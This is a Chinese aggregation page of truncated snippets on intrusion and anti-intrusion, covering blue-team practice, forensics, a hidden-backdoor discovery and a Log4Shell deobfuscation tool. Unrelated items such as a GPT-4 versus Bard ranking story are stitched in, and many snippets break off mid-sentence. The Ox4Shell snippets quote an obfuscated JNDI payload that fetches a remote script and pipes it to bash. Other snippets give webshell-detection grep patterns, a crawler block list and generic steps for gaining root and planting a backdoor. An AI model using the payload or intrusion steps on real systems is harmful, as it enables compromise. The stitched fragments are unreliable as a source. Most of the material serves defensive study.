YashanDB反入侵

在数据库层建立防火墙主要用于检测和防御外部入侵风险，可以采用如下机制： 建立IP黑/白名单，白名单里的IP上所发起的登录请求才允许连接，黑名单里的IP上所发起的登录请求不允许连接。

蓝队反入侵工作经验分享

点击图片查看指南 何为反入侵？ 那就要先知道什么是入侵行为，这里的入侵主要指通过各种方式进入企业公司内部，获取权限，盗取数据的行为，也就是咱们通常所说的红队的成功的入侵行为，而反入侵的存在就是为了防止红队成员成功获得内部权限、盗取敏感数据 对于反入侵而言，必须要了解攻击者的入侵是怎么做的才能做好反入侵的工作，业界知名的 ATT&CK 框架将攻击者的整个链条进行拆解，很多商业的 APT 防护产品也在对照其进行技术研究，开发针对性的检测能力， 4、响应阶段 在发现入侵事件之后，就要开启应急响应的流程，及时定位问题所在，及时止损，排查相关日志和告警信息，找出问题的根源，应急响应的时效性决定了你在这场攻防对抗中是否处于主导地位，拖得时间越久，攻击者扎根扎的越深 反入侵的工作也就是针对这几个阶段不断进行优化迭代，形成闭环，持续缩小 MTTD 和 MTTR，让攻击者有来无回。 以上是我对于反入侵工作的认识和理解，希望能引起大家的思考，下期见。

反黑客行动--如何抓住利用批量爆破PHPmyadmin进行入侵脚本小子

大叔 攻击方式：利用域名采集程序根据关键字UPUPW进行采集，再批量扫描phpmyadmin弱口令工具A进行批量爆破，爆破后利用工具B进行写webshell，猜测木马是手工种的，很有可能在被入侵服务器上运行了那个类似挂机宝的程序

2019-4-27-反模式之the blob

设计模式大家都非常了解，不过反模式大概很少人听过。 没错，反模式顾名思义就是把大家平时在编程，代码设计，项目管理中遇到的各种典型错误归类， 总结出的“高考0分作文” The Blob 介绍 the blob 来源于美国电影幽浮魔点 - 维基百科，自由的百科全书 幽浮魔点 - 维基百科，自由的百科全书 ---- 本文会经常更新，请阅读原文： https://xinyuehtx.github.io/post/%E5%8F%8D%E6%A8%A1%E5%BC%8F%E4%

反入侵之发现后门利用mount-bind将进程和端口信息隐匿

前言 作为一名安全工程师，日常工作中会经常遇到网站遭遇入侵，甚至被植入后门，如何去发现后门，进而对入侵进行调查取证都是一名优秀的安全工程师必备功课，本文结合实际案例介绍一下一款后门的植入技巧，以及我是如何发现它的 第5列应该是0 啊，这里怎么是4096 ，这个进程有问题 cd 2694 目录看看， 发现是个空目录，这时可以确定2694 这个进程有重大嫌疑 看一下这个2694 目录是不是被硬链接了 (有点怀疑入侵者使用了 这行比较关键：/tmp/empty /proc/2694 rw,relatime shared:1 - ext4 /dev/sda1 rw,errors=remount-ro,data=ordere 再看一下 大小和/pro/2694 一样 原来入侵者通过 mount —bind /tmp/empty /proc/2694 将后门进程(2694) 信息隐藏起来了 恢复 知道后门进程被隐藏之后，恢复也就比较简单了

【nginx】反代knife4j接口文档

Ox4Shell工具-轻松反混淆 Log4Shell 有效负载

描述 自 Log4Shell 漏洞 (CVE-2021-44228) 发布以来，创建了许多工具来混淆 Log4Shell 有效负载，使安全工程师的生活成为一场噩梦。 例如，考虑以下混淆的有效负载： ${jndi:ldap://1.1.1.1:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNTAuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA 用法 要简单地运行该工具： ~/Ox4Shell » python ox4shell.py --help usage: ox4shell [-h] [-d] [-m MOCK] [--max-depth 的模拟功能对以下有效负载进行反混淆： ~/Ox4Shell >> python ox4shell.py -p "\${jndi:ldap://\${sys:java.version}. 工具下载：https://github.com/ox-eye/Ox4Shell#ox4shell

如何使用Ox4Shell反混淆Log4Shell的Payload

 关于Ox4Shell  Ox4Shell是一款针对Log4Shell Payload代码反混淆工具，自从Log4Shell漏洞（CVE-2021-44228）被发现之后，很多工具都开始尝试对Log4Shell 比如说下列经过混淆处理的Payload： ${jndi:ldap://1.1.1.1:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNTAuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA on -p PAYLOAD, --payload PAYLOAD 待反混淆的单个 (默认: None) -f FILE, --file FILE 包含待反混淆的Payload文件路径 (默认: None) （向右滑动、查看更多）  模拟数据  Log4j代码库有几个独特的查询函数，允许用户查找环境变量和Java进程的运行时信息等。 的模拟数据能力来对下列Payload进行反混淆处理： ~/Ox4Shell >> python ox4shell.py -p "\${jndi:ldap://\${sys:java.version}.

披荆斩棘：论百万级服务器反入侵场景的混沌工程实践

0x1 腾讯反入侵面临的极大挑战 要说明反入侵具体的工作内容，则要先对“入侵”进行定义。 这里的入侵主要指“未经授权”的行为。 一般来说，从入侵动作基本能追溯到一条完整的行为链路。那么说到反入侵，能够在链路中的关键路劲层层设防，就是反入侵的基本。 反入侵系统，目标是及时发现入侵行为，对入侵行为进行回溯，然后加固系统的薄弱点。 0x2 复杂规模下的反入侵系统质量建设 反入侵系统质量的好坏，已成反入侵体系是否有效的关键因素。然而，如何进行系统质量的有效建设，又是一个极大的工程。 指标化描述，是对质量建设和优化的基础需求。 这就是复杂规模下反入侵系统质量建设的整体思路。 0x3 腾讯反入侵场景下的混沌实践 那么，反入侵场景下的混沌实验，具体是如何进行的？ 0x4 后记 本文介绍了反入侵工作的相关背景，以及反入侵洋葱系统在质量建设方面的思路和推进方法。

披荆斩棘：论百万级服务器反入侵场景的混沌工程实践

作者：【腾讯反入侵团队】jaylam 企业微信截图_b0f4d6f5-3aad-4c06-abd2-26edfeb24dc4.png 在繁杂的业务和网络环境下，在公司百万级服务器面前，要做到入侵发生时的及时检测 一般来说，从入侵动作基本能追溯到一条完整的行为链路。那么说到反入侵，能够在链路中的关键路劲层层设防，就是反入侵的基本。 反入侵系统，目标是及时发现入侵行为，对入侵行为进行回溯，然后加固系统的薄弱点。 图片 4.png 但是现网的各个模块体系下，实际运营过程中还是出现了埋点指标外的相关异常情况，导致入侵漏水。 这就是复杂规模下反入侵系统质量建设的整体思路。 0x3 腾讯反入侵场景下的混沌实践 那么，反入侵场景下的混沌实验，具体是如何进行的？ 0x4 后记 本文介绍了反入侵工作的相关背景，以及反入侵洋葱系统在质量建设方面的思路和推进方法。

黑客新手入侵云服务器仅需4小时

外国媒体发表文章对云服务器的安全性做了剖析，以下为文章内容摘要：入侵云服务器需要多长时间？ 为了探究这一问题答案，云安全创新企业CloudPassage联接6台服务器、2部运行微软操作系统的电脑以及4部运行Linux操作系统的电脑，并在电脑中下载形形色色被用户广泛使用的程序。 最终其中一名黑客只花了4个小时就成功入侵CloudPassage所配置的云服务器。 更糟糕的是，他只是IT业的新手。 格雷在研究了服务器上的操作系统和应用后，决定尝试能否把其中一个允许远程访问的应用作为实施入侵的漏洞。这一应用使用缺省密码，网络上已公布了数百个程序的缺省密码，因此格雷很容易就猜出密码。 格雷表示，“我回到公司做的第一件事就是马上对计算机设置做了几处修改，确保类似的入侵不会发生在我们公司中。”

centos入侵溯源

jndi|excute|%20|system|exec|passthru|shell_exec|popen|proc_open'三、 查看系统日志分析登陆日志继续分析登陆日志，查看失陷主机是否有其他被入侵的途径分析方式 \.#(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?) \.(25[0-5]|2[0-4] [0-9]|[01]?[0-9][0-9]?)" print $9}' | sort | uniq -c | sort -nr四、扫描异常文件我们对服务器进行扫描，检测是否存在异常的文件（如webshell文件或者其他挖矿脚本文件），从文件中尝试分析服务器被入侵原因主要借助工具 ，但是通常情况下从文件中尝试分析服务器被入侵原因成功率不高，因为攻击者通常不会在文件里面留下入侵痕迹参考命令egrep 'eval|\$_POST|\$_REQUEST|\$_GET|assert' /

Linux入侵小结

Linux不同的用户，有不同的操作权限，但是所有用户都会在/etc/passwd /etc/shadow /etc/group /etc/group- 文件中记录；

IOS7 beta4修复伪造充电器入侵漏洞

在7月初举办的黑帽大会上，有组织曾经爆出利用伪造的iPhone充电器对手机入侵的漏洞。利用该漏洞生产充电器的成本在45美元左右，除了DC模块外，还需要置入一块运行Linux的小型芯片。 不过Apple已经在最新IOS7 beta4系统中修复了这个漏洞，但由于发布时间临近，IOS6可能不会再次更新。这就意味着目前正在运行IOS6系统的iPhone仍然受此漏洞影响。

​网络入侵步骤

4. 检查服务软件的附属程序(*1)是否存在漏洞，如果是，利用该漏洞远程进入系统；否则进入下一步。 5. 4. 检查重要文件的权限是否设置错误，如果是，利用该漏洞提升权限，否则进入下一步。 　　 5. 检查配置目录(*2)中是否存在敏感信息可以利用。 　　 6. 检查其它目录(*4)是否存在可以利用的敏感信息。 　　 9. 重复以上步骤，直到获得root权限或放弃。 第三步：放置后门 　　最好自己写后门程序，用别人的程序总是相对容易被发现。

IPC远程入侵

一、什么是IPC 进程间通信（IPC，Inter-Process Communication），指至少两个进程或线程间传送数据或信号的一些技术或方法。进程是计算机系统分配资源的最小单位(严格说来是线程)。每个进程都有自己的一部分独立的系统资源，彼此是隔离的。为了能使不同的进程互相访问资源并进行协调工作，才有了进程间通信。举一个典型的例子，使用进程间通信的两个应用可以被分类为客户端和服务器，客户端进程请求数据，服务端回复客户端的数据请求。有一些应用本身既是服务器又是客户端，这在分布式计算中，时常可以见到。这

GPT-4不服被Bard反超：最新模型已入场

西风 发自 凹非寺 量子位 | 公众号 QbitAI “大模型排位赛”权威榜单Chatbot Arena刷新： 谷歌Bard超越GPT-4，排名位居第二，仅次于GPT-4 Turbo。 并且直接@了OpenAI和Bing以及微软高管Mikhail Parakhin，表示非常乐意在竞技场中加入GPT-4联网版或Bing Copilot。 最新消息是，OpenAI的最新模型gpt-4-0125-preview现已入驻竞技场，等待用户参与投票。 Bard超越GPT-4是怎么回事？ 根据当前榜单，竞技场中有56个大模型： 此前GPT-4凭借“遥遥领先”的评分，长期霸榜，然而新版Bard发布后，直接超越GPT-4的两个版本冲到了第二名，和第一名的GPT-4 Turbo只差34分： 更详细一点 相较而言，GPT-4 Turbo的票数已经达到了30000+，被超越的两个版本的票数也都是Bard的数倍。

利用nginx反爬虫-UA反爬

Nginx配置 if ($http_user_agent ~* (Scrapy|Curl|HttpClient)) { return 403; } # UA if ($http_user_agent ~ "Bytespider|FeedDemon|JikeSpider|Indy Library|Alexa Toolbar|AskTbFXTV|AhrefsBot|CrawlDaddy|CoolpadWebkit|Java|Feedly|UniversalFeedParser|Apach

kali入侵windows

因为我是一个爱好和平的人（捂嘴笑），所以就在虚拟机中，创建二个系统，一个kali，一个windows xp，来进行这次入侵实验，以此迈入hacke的大门。 主机模式.jpg 2.2 IP（这里是ipv4）地址分类，网络类型。 ip地址，由《net-id,host-id》二部分组成。 重要细节 1.0 因为在vmware模拟kaili入侵windows xp所以要保证这二台虚拟机可以通信，试验的vmware采用桥接网络，二台虚拟机相当于独立的主机，在vmware想要通信，必须处于同一网段 2.0 为了试验效果明显，最好关闭掉windows的防火墙，这样入侵更容易，而且自己原本的主机把杀毒软件也关闭了。 入侵开始 1.0 查看linux的ip地址 root@kali:~# ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

黑客新手4小时入侵云服务器 敲响云安全警钟

一个IT业的新手，只花了4个小时就成功入侵了云服务器，这给云安全敲响了警钟，那么，这个黑客新手是通过什么方法来入侵云服务器的呢?为了确保云安全，应该采取哪些措施呢? 1. 一名黑客只花了4个小时就成功入侵CloudPassage所配置的云服务器。更糟糕的是，他只是IT业的新手。这个28岁的小伙子名叫格斯•格雷(Gus Grey)，在一家科技公司刚刚工作了一年多。 他登录后，基本上从这一应用上获得了整个服务器的管理权限，成功完成入侵。 3. 为了探究这一问题答案，云安全创新企业CloudPassage联接6台服务器、2部运行微软操作系统的电脑以及4部运行Linux操作系统的电脑，并在电脑中下载形形色色被用户广泛使用的程序。 最终其中一名黑客只花了4个小时就成功入侵CloudPassage所配置的云服务器。更糟糕的是，他只是IT业的新手。